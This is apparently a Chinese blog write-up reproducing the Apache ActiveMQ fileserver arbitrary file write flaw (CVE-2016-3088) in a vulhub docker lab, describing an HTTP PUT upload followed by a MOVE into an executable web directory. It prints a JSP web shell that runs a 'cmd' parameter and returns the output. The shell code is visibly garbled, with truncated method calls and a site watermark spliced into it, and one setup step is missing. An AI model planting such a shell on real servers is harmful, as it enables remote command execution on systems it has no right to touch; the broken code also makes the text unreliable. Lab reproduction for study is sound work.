ActiveMQ任意⽂件写⼊漏洞(CVE-2016-3088)复现
⼀、漏洞描述
该漏洞出现在fileserver应⽤中,漏洞原理:ActiveMQ中的fileserver服务允许⽤户通过HTTP PUT⽅法上传⽂件到指定⽬录。Fileserver⽀持写⼊⽂件(不解析jsp),但是⽀持移动⽂件(Move)我们可以将jsp的⽂件PUT到Fileserver下,然后再通过Move指令移动到可执⾏⽬录下访问。
⼆、影响版本
Apache ActiveMQ 5.0.0 - 5.13.2
三、环境搭建
1、下载、搭建vulhub
2、下载、安装docker服务,使⽤docker-compose up -d启动环境即可
访问1.txt,确定成功上传
⽊马如下:
<%@ page import="java.io.*"%>
<%
try{
String cmd = Parameter("cmd");
Process child = Runtime().exec(cmd);
InputStream in = InputStream();
int c;
while((c = in.read())!= -1){
out.print((char)c);
}
cve漏洞库in.close();
try{
child.waitFor();
}catch(InterruptedException e){
e.printStackTrace();
}
}catch(IOException e){
}
%>
4、采坑⽆数得知,fileserver⽬录是没有解析权限的,所以需要将shell⽂件移动到存在权限的⽬录中,故使⽤MOVE⽅式,将shell移动到/opt/activemq/webapps/api/⽬录中,返回包返回204说明移动成功
执⾏命令,成功!
over!
over!!
over
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论